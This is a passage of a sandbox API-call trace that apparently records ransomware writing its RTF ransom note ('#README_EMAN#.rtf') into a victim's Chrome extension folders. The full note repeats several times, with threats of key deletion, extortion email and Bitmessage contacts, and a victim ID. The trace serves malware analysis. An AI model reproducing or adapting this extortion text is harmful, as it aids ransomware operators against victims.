lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nu y5\x97>\x13¹\x0cgR6÷Æ\x1dáh\x8f\"ûT¹\x9fcN", lpUsedDefaultChar=0x0) returned 8717 [0278.226] WriteFile (in: hFile=0x294, lpBuffer=0x1f495e8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1f495e8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0278.227] CloseHandle (hObject=0x294) returned 1 [0278.227] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\#readme_eman#.rtf")) returned 0xffffffff [0278.227] GetLastError () returned 0x2 [0278.227] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0278.228] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.228] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.228] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 